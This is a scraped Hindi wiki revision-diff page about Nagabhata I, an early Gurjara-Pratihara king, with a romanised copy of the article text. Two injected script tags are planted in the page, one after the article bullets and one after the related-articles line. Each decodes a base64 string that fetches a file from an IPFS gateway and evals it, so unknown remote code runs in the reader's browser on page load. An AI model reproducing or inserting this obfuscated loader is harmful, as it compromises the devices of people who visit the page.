Difference between revisions of "नागभट्ट प्रथम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*[[गुर्जर प्रतिहार वंश]] का प्रथम ऐतिहासिक पुरुष 'हरिशचन्द्र' था।
+
'''नागभट्ट प्रथम''' [[गुर्जर प्रतिहार वंश]] का प्रथम ऐतिहासिक पुरुष था। इसे 'हरिशचन्द्र' के नाम से भी जाना जाता था।
 
*हरिशचन्द्र की दो पत्नियाँ थीं- एक [[ब्राह्मण]] थी और दूसरी क्षत्रिय।
 
*हरिशचन्द्र की दो पत्नियाँ थीं- एक [[ब्राह्मण]] थी और दूसरी क्षत्रिय।
 
*माना जाता है कि, ब्राह्मण पत्नी से उत्पन्न पुत्र 'माला' पर शासन कर रहा था तथा क्षत्रीय पत्नी से उत्पन्न पुत्र [[जोधपुर]] पर शासन कर रहा था।
 
*माना जाता है कि, ब्राह्मण पत्नी से उत्पन्न पुत्र 'माला' पर शासन कर रहा था तथा क्षत्रीय पत्नी से उत्पन्न पुत्र [[जोधपुर]] पर शासन कर रहा था।
*किन्तु इस वंश का वास्तविक महत्त्वपूर्ण राजा '''नागभट्ट प्रथम''' (730 - 756 ई.) था।
+
*किन्तु इस वंश का वास्तविक महत्त्वपूर्ण राजा नागभट्ट प्रथम (730 - 756 ई.) था।
 
*उसके विषय में [[ग्वालियर]] अभिलेख से जानकारी मिलती है, जिसके अनुसर उसने [[अरब|अरबों]] को [[सिंध]] से आगे नहीं बढ़ने दिया।
 
*उसके विषय में [[ग्वालियर]] अभिलेख से जानकारी मिलती है, जिसके अनुसर उसने [[अरब|अरबों]] को [[सिंध]] से आगे नहीं बढ़ने दिया।
 
*इसी अभिलेख में बताया गया है कि, वह [[नारायण]] रूप में लोगों की रक्षा के लिए उपस्थित हुआ था तथा उसे मलेच्छों का नाशक बताया गया है।
 
*इसी अभिलेख में बताया गया है कि, वह [[नारायण]] रूप में लोगों की रक्षा के लिए उपस्थित हुआ था तथा उसे मलेच्छों का नाशक बताया गया है।
Line 16: Line 16:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{मध्य काल}}
+
{{मध्य काल}}{{प्रतिहार साम्राज्य}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:मध्य काल]]
 
[[Category:मध्य काल]]
 
[[Category:प्रतिहार साम्राज्य]]
 
[[Category:प्रतिहार साम्राज्य]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:08, 15 April 2012

nagabhatt pratham gurjar pratihar vansh ka pratham aitihasik purush tha. ise 'harishachandr' ke nam se bhi jana jata tha.

  • harishachandr ki do patniyaan thian- ek brahman thi aur doosari kshatriy.
  • mana jata hai ki, brahman patni se utpann putr 'mala' par shasan kar raha tha tatha kshatriy patni se utpann putr jodhapur par shasan kar raha tha.
  • kintu is vansh ka vastavik mahattvapoorn raja nagabhatt pratham (730 - 756 ee.) tha.
  • usake vishay mean gvaliyar abhilekh se janakari milati hai, jisake anusar usane araboan ko siandh se age nahian badhane diya.
  • isi abhilekh mean bataya gaya hai ki, vah narayan roop mean logoan ki raksha ke lie upasthit hua tha tatha use malechchhoan ka nashak bataya gaya hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>